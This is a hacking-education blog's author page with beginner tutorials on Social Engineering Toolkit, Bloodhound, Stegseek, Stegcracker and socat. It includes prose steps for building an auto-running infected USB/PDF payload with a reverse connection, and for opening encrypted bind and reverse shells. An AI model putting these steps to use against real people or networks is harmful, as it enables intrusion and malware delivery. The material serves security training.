Anamar Taknev, Author at Hackercool Magazine

Posted on March 7, 2025March 7, 2025 by Anamar Taknev

Social Engineering Toolkit (SET): Beginners guide

Hello, aspiring ethical hackers. In our previous article, you learnt what is social engineering and various types of social engineering attacks. In this article, you will learn about Social Engineering Toolkit (SET), an open-source pen testing framework designed for performing versatile social engineering attacks.

Let’s see how this tool works. For this, we will be using Kali Linux as SET in installed by default in it. You can start SET using the command shown below.

sudo setoolkit

When it prompts you to agree to “terms of services”, type “Y”.

Then the primary menu of Social Engineering Toolkit is displayed to you.

The primary menu of SET is divided into seven sections. The first one consists of all the social engineering attacks that you can perform with SET tool.

These include attacks like spear phishing, phishing etc. The second one consists of all the penetration testing attacks like MSSQL brute forcing attack etc.

Third in the list is all the third party modules included in SET.

These include attacks like Google analytics attack, RATTE attack etc.

The 4th, 5th, 6th and 7th options are used to update SET, update SET configuration, help and exit option for SET respectively.

Now, let’s see how to perform an attack with SET. For this blogpost, let’s create a infectious media. An infectious media attack is an attack in which a media like DVD,CD or USB drive is infected with malicious payloads and left close to our intended target users. Called a Road apple attack, the idea behind this is that an employee may get enticed by the free media that he got and insert it in his office devices to check what it has. In infectious media attack, the payload hosted in media is configured to run automatically as soon as the device is inserted, This is possible by including a AUTORUN.INF file along with the payload.

To create this attack, I select option 3 in the menu of social engineering attacks.

As you can see in the above image, it will create a metasploit payload along with “AUTORUN.INF” file.

I select the first option, the file format exploit method. After selecting this, you need to enter IP address for the reverse connection (Listener IP address). After doing this, it will prompt you to select the file format you want your payload to take.

By default, it uses the PDF embedded exe. In this, an Exe file is embedded inside the PDF file. I will go with the default option. Next, it will prompt you if your want to use your own PDF or a built in blank PDF for this attack.

For higher success rate of infecting with this attack vector, it is highly recommended to use a custom PDF. However, for this tutorial, I will use the default blank PDF. It’s time to select the payload.

Select the payload you want and assign the listener IP and listener port. These are given automatically by SET tool itself. If you want to make any changes, you can make them. Otherwise, just hit ENTER.

You can start the listener immediately from SET or later through Metasploit. The payload and AUTORUN.INF file are saved “SET”. The attack vector is saved with the name “template.pdf”. This file along with AUTORUN.INF file need to be placed on the media of your choice (CD/DVD/USB), thus completing the infectious media attack.

Learn how to perform a phishing attack with Weeman HTTP server and GoPhish.

Posted on February 28, 2025February 28, 2025 by Anamar Taknev

Beginners guide to Bloodhound tool

Hello, aspiring ethical hackers. In this article, you will learn about Bloodhound, an open-source tool that helps in identifying attack paths and relationships in Active Directory environment. Its also useful in uncovering hidden information about domain and security misconfigurations in AD (which would be impossible to find otherwise). Bloodhound is one of the favorite tools of both Red team hackers and Blue Team hackers.

Let’s see how this tool works. For this, we will be using Kali Linux as bloodhound is available by default in its repositories.

Once bloodhound is installed successfully you need to change permissions of the “neo4j” folder as shown below. Ne04i is a native graph database that is used by bloodhound.

Next, we need to start neo4j console as shown below.

It provides a remote interface as the URL as shown in the above image. Click on that URL to access the remote interface. The URL opens in a browser. It will prompt you for authentication. The default username and password for logging into Neo4j is (neo4j;neo4j).

Unless you change the default credentials, Ne04j will not work. So change the password.

Now, Neo4j database is all set. To start bloodhound, use command as shown below.

bloodhound

A browser should automatically open with a login option as shown below. Login with the Neo4j username and the new password you set.

A almost white screen should welcome you as shown below.

Bloodhound is successfully installed and ready to be used. To see how this tool works first we need to collect data belonging to a active directory environment. This can be done using a tool provided by the makers of bloodhound known as SharpHound. Data can be collected using SharpHound as shown below.

However, SharpHound has been giving some errors while collecting data lately. See, if it works for you. There is also some sample data available for download to see the working of bloodhound. This can be downloaded from here. This sample data in the form of zip archive can be uploaded to bloodhound as shown below.

Even uploading of this data is posing some problems. But don’t worry. we will soon be updating this article. Please watch out.

Posted on February 12, 2025February 12, 2025 by Anamar Taknev

Complete guide to Stegseek

Hello, aspiring ethical hackers. In our previous blogposts, you learnt what is steganography, its uses and how to hide secret data in an image using the tool Steghide. In this blogpost, you will learn about a tool that can retrieve this hidden data from an image. The tool’s name is Stegseek.

Although the working of Stegseek is same as Stegcracker, it is a lightning fast steghide cracker that is thousands of times faster than other crackers and can run through the entirety of rockyou.txt wordlist in under 2 seconds. Let’s see how this tool works. For this article, we will be using Kali Linux as our attacker system as this tool is installed by default on Kali Linux. For performing steganography attack, we will be using same image in which we have hidden data using Steghide, “Volcano_with_Secret,jpg”.

All you need to retrieve the hidden information from the image with this tool is to just supply the path of the image as shown below.

The “-sf” option stands for stego file. A stego file is a file that contains hidden information in it.

As you can see in the above image, Stegseek cracked the password (123456) of this file and successfully retrieved the hidden data. That too in lightning speed pace. The retrieved data from the image is saved in a file named <name of the file.jpg.out>. By default, Stegseek uses rockyou.txt wordlist to brute-force the password.

Specify a different wordlist (-wl)

We can even specify a different dictionary or wordlist if needed as shown below.

Select file name for extracting data (-xf)

As you already read at the beginning of this article, stegseek saves retrieved hidden data to a file named “<name-of-the-file>.out”. To extract the hidden data to a different fie, we can use this option. For example, let’s save the retrieved data to a file named “secret.txt” as shown below.

Overwrite existing file (-f)

In the above image, you can see that when we extracted hidden information to a file named “secret.txt”, we got prompted saying that there is already a file with the same name and if I wanted to overwrite it. Well, using this option, we can force overwrite already existing file.

Get detailed output (-v)

This option gives us detailed output while using Stegseek.

Quiet mode(-q)

On the contrary, you can run Stegseek in quiet mode. Running in this mode will just display the cracked password of the file as shown below and of course retrieve the hidden data. Status updates or other output is not displayed.

Skip defaults (-s)

Specifying this option skips adding default guesses while cracking like using an empty password, the name of the file etc to the wordlist.

Number of threads (-t)

By default, stegseek uses 4 threads while cracking the password. Increasing the number of threads can lead to better performance. Threads can be increased or decreased using this option. For example, let’s increase the number of threads to 10.

Posted on February 5, 2025February 5, 2025 by Anamar Taknev

Complete guide to Stegcracker

Hello, aspiring ethical hackers. In our previous blogposts, you learnt what is steganography, it’s uses and how to hide secret data in an image using the tool Steghide. In this blogpost, you will learn about a tool that can retrieve hidden data from an image. The tool’s name is Stegcracker.

Stegcracker is a steganography brute-force utility to uncover hidden data inside files. Let’s see how this tool works. For this article, we will be using Kali Linux as our attacker system as this tool is available by default in its repositories. For performing steganography attack, we will be using same image in which we have hidden data using Steghide “Volcano_with_Secret,jpg”.

Check version (-v)

It is a good practice to check the version of the tool first before doing anything with the tool. You can check the version of Stegcracker using this option.

All you need to retrieve the hidden information from the image with this tool is to just supply the path of the image as shown below.

As you can see in the above image, Stegcracker cracked the password (123456) of this file and successfully retrieved the hidden data too. The retrieved data from the image is saved in a file named <name of the file.jpg.out>. By default, Stegcracker uses rockyou.txt wordlist to brute-force the password.

Specify a different wordlist

We can even specify a different dictionary or wordlist if needed as shown below.

Verbose output (-V)

This option can be used to get detailed output from stegcracker.

Quiet mode(-q)

On the contrary, you can run Stegcracker in quiet mode. Running in this mode will just display the cracked password of the file as shown below and of course retrieve the hidden data. Status updates or other output is not displayed.

Number of threads (-t)

By default, stegcracker user 16 threads while running. Increasing the number of threads can lead to better performance. Threads can be increased or decreased using this option. For example, let’s increase the number of threads to 32.

Saving the output (-o)

As you already read at the beginning of this article, stegcracker saves retrieved hidden data to a file named “<name-of-the-file>.out”. However this can be changed using the “-o” option.

For example, let’s save the retrieved data to a file named “secret.txt” as shown below.

Posted on January 17, 2025January 17, 2025 by Anamar Taknev

Beginners guide to Socat

Hello, aspiring ethical hackers. In our previous blogpost, you learnt how to use netcat for various purposes in ethical hacking. In this blogpost, you will learn about another such tool named Socat.

Socat, shortcut for SOcket CAT is a command line utility that enables bidirectional data transfer between two independent data channels. Actually, it can provide multiple functions. It supports many protocols like TCP, UDP, SOCKS4 and OpenSSL.

Bind and Reverse shells

The use of socat tool comes after you completed gaining access to target network or device. Here, it helps you in maintaining access as channel for communication.

Let’s see how to create bind shells with socat (learn about different types of shells). For this, we will be using Metasploitable2 as target system in our virtual hacking lab. Note that socat should be installed on both target and attacker systems for this to work. To create a bind shell, run this command on the target system as shown below.

Then on the attacker system, we need to run this command.

Here’s our bind shell.

To create reverse shell, the above commands should be run on attacker and target system respectively.

Here’s our reverse shell.

Encrypted bind and reverse shell with socat

The above shells, although they are good, the data between them is transferred in plain text and is susceptible to sniffing and detection. No problems though. Socat can create an encrypted shell using OpenSSL.

To create an encrypted shell, first, we need to create a SSL key as shown below. Two files with extensions “.crt” and “.key” are created as shown below.

Then, we need to join this two files into one file with “.pem” file as shown below.

Now this file should be on the system on which we start our listener. For example, to create a bind shell, the “ssl.pem” should be on the target system. Then we need to run command as shown below.

Then, on attacker system we should run this command shown below.

Here’s the shell.

Similarly, we can also create a reverse shell.

File transfer

Socat can also be used to transfer files between two machines. For example, to transfer that SSL certificate we created above from attacker system to target system, the command to be run on the attacker system is shown below.